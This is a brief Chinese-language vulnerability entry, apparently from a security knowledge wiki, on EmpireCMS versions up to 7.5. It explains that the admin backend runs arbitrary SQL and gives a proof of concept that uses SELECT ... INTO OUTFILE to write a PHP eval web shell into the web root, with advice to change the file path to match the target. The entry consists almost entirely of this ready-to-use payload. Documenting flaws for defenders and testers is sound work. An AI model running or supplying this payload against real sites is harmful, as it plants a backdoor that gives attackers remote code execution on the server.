跳转至

EmpireCMS

漏洞范围

EmpireCMS <= V7.5

漏洞验证

由于后端没有对执行的语句做限制导致可以执行恶意sql语句。 POC:

select '<?php @eval($_POST[1])?>' into outfile 'D:/phpstudy_pro/WWW/shell.php'

根据实际路径修改路径即可。


最后更新: 2021-03-24